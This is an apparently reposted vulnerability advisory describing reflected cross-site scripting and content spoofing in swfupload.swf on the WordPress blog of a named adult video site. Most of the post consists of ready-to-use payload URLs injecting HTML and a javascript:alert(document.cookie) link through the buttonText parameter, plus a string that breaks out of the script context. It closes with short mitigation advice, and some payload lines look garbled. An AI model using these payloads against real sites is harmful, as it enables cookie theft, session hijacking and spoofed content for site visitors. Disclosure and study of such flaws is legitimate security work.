Cross Site Scripting in RedTube Official Blog

#Title: Cross Site Scripting in RedTube Official Blog

Vector of operation: Remote
Impact: Cross Site Scripting & Content Spoofing


The vulnerability is caused due to insufficient input validation in the parameter
“movieName” and "buttonText" in the script to swfupload.swf “ ()”. This can be
exploited to execute arbitrary HTML and script code in a user’s browser session in
context of an affected site.

There are two vulnerabilities in RedTube Official Blog.

*Content Spoofing

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src=''>

It's possible to inject text, images and html (e.g. for link injection).

*Cross-Site Scripting

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>

Code will execute after click. It's strictly social XSS.

*Proof of Concept Code

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=testbuttonText=test<img src=''>

*Live Preview"]);}catch(e){}if(!self.a)self.a=!alert("xss");//<a href='javascript:alert(document.cookie)'>Click me</a><img src=''>

On the server side, you can upgrade to a non-vulnerable version. Onthe client
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.

Postingan terkait:

Belum ada tanggapan untuk "Cross Site Scripting in RedTube Official Blog"

Post a Comment